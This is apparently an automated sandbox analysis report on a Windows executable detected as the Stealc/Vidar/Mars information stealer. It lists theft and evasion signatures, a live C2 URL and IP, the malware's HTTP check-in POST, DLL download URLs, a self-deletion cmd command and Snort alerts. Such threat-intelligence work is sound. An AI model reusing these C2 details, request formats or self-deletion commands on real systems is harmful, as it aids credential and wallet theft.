Edit tour

Windows Analysis Report
jlO7971vUz.exe

Overview

General Information

Sample name:	jlO7971vUz.exe renamed because original name is a hash value
Original sample name:	4bfe7a656d28f578ca10aba4c225ff41.exe
Analysis ID:	1465225
MD5:	4bfe7a656d28f578ca10aba4c225ff41
SHA1:	abbff97043065c3ad54d826b2999f84d4a013b1e
SHA256:	00bb7850e80e07facb1d30a0d41b271469905a2b856eb80d1d34bdff21130985
Tags:	exeStealc
Infos:

Detection

Mars Stealer, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Self deletion via cmd or bat file

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

jlO7971vUz.exe (PID: 2380 cmdline: "C:\Users\user\Desktop\jlO7971vUz.exe" MD5: 4BFE7A656D28F578CA10ABA4C225FF41)

cmd.exe (PID: 6152 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\jlO7971vUz.exe" & del "C:\ProgramData\*.dll"" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3140 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "147.45.78.162/a17861b9cb6f1a53.php"}

Threatname: Vidar

{"C2 url": "http://147.45.78.162/a17861b9cb6f1a53.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2244401333.0000000001690000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: jlO7971vUz.exe PID: 2380	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: jlO7971vUz.exe PID: 2380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jlO7971vUz.exe PID: 2380	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.jlO7971vUz.exe.17e0000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.jlO7971vUz.exe.17e0000.1.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.jlO7971vUz.exe.17e0000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.jlO7971vUz.exe.17e0000.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security

Snort Signatures

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 147.45.78.162

Timestamp:	07/01/24-13:02:05.496717
SID:	2044246
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 147.45.78.162 - Destination IP: 192.168.2.5

Timestamp:	07/01/24-13:02:05.700850
SID:	2051831
Source Port:	80
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 147.45.78.162

Timestamp:	07/01/24-13:02:04.635837
SID:	2044243
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 147.45.78.162 - Destination IP: 192.168.2.5

Timestamp:	07/01/24-13:02:05.493573
SID:	2051828
Source Port:	80
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 147.45.78.162

Timestamp:	07/01/24-13:02:05.288270
SID:	2044244
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 147.45.78.162Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 46 34 30 34 37 33 46 34 41 30 32 37 34 30 37 32 35 36 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 31 32 33 52 65 62 6f 72 6e 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="hwid"8CF40473F4A02740725608------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="build"123Reborn------KKJDGDHIDBGIECBGHJDB--

Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/a17861b9cb6f1a53.php
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/a17861b9cb6f1a53.php.0//EN
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/a17861b9cb6f1a53.phpX
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/freebl3.dll
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/freebl3.dll1
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/mozglue.dll
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/mozglue.dllW
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll#
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/nss3.dll
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/nss3.dll_=
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/softokn3.dll
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/softokn3.dllw
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/sqlite3.dll
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.78.162/d82daa352ff6e06f/vcruntime140.dll
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: jlO7971vUz.exe, jlO7971vUz.exe, 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: jlO7971vUz.exe, 00000000.00000002.2255571648.000000001BCA8000.00000004.00000020.00020000.00000000.sdmp, jlO7971vUz.exe, 00000000.00000002.2271443731.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://support.mozilla.org
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: jlO7971vUz.exe, 00000000.00000002.2261143124.0000000027D2A000.00000004.00000020.00020000.00000000.sdmp, BKJKEBGDHDAFHJKEGIID.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jlO7971vUz.exe, 00000000.00000002.2243998143.0000000001413000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGH.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: jlO7971vUz.exe, 00000000.00000003.2228553224.000000002DF38000.00000004.00000020.00020000.00000000.sdmp, JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: jlO7971vUz.exe, 00000000.00000003.2228553224.000000002DF38000.00000004.00000020.00020000.00000000.sdmp, JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: jlO7971vUz.exe, 00000000.00000003.2228553224.000000002DF38000.00000004.00000020.00020000.00000000.sdmp, JDBGHIIDAECBFIDHIIDGIIIIII.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: jlO7971vUz.exe, 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: C:\Users\user\Desktop\jlO7971vUz.exe

Code function: 0_2_017F6F20 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

0_2_017F6F20

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B32690 LoadLibraryA,GetProcAddress,GetProcAddress,NtUnmapViewOfSection,GetProcAddress,GetCurrentProcess,NtAllocateVirtualMemory,GetCurrentProcess,	0_2_00B32690
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C49B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C49B700
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C49B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C49B8C0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C49B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C49B910
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C43F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C43F280

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B32690	0_2_00B32690
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B32B10	0_2_00B32B10
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3ACD0	0_2_00B3ACD0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3B4D0	0_2_00B3B4D0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B33590	0_2_00B33590
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3B9D0	0_2_00B3B9D0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B40572	0_2_00B40572
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B40692	0_2_00B40692
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B36280	0_2_00B36280
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3EAD9	0_2_00B3EAD9
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3DFB0	0_2_00B3DFB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_00B3A7E0	0_2_00B3A7E0
